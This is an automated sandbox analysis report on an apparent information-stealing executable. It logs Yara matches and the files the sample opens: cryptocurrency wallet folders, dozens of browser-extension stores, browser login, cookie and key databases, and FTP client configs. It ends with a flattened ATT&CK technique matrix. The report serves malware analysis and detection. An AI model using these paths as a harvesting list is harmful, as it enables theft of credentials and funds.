                Source: Yara matchFile source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: tTGxYWtjG5.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: tTGxYWtjG5.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: tTGxYWtjG5.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474406524.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474406524.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: tTGxYWtjG5.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLAJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: Yara matchFile source: 00000001.00000003.1436505307.0000000000864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1436316095.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1436238542.0000000000859000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000001.00000003.1474101580.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1473906680.000000000087D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tTGxYWtjG5.exe PID: 424, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                2
                Process Injection
                44
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services41
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                2
                Process Injection
                LSASS Memory851
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager44
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets1
                File and Directory Discovery
